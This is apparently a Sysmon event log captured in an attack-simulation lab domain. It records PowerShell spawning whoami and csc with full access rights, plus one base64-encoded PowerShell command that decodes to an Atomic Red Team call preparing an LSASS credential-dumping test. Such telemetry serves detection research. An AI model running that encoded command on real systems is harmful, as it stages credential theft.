15:52:45.976{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004225Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004224Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004223Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004222Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004221Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004220Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CCD-5FA1-D200-000000008801}788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004219Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCD-5FA1-D200-000000008801}788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffd2c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffd2c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312083cc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64) 154100x80000000000000004218Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.982{D28789B6-7CCD-5FA1-D200-000000008801}788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2cglhyim\2cglhyim.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 11241100x80000000000000004217Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2cglhyim\2cglhyim.cmdline2020-11-03 15:52:45.976 11241100x80000000000000004216Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:45.976{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2cglhyim\2cglhyim.dll2020-11-03 15:52:45.976 10341000x80000000000000004215Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCD-5FA1-D100-000000008801}4144C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004214Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004213Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004212Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004211Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004210Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004209Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004208Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004207Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004206Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004205Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CCD-5FA1-D100-000000008801}4144C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004204Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.789{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCD-5FA1-D100-000000008801}4144C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31d4331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d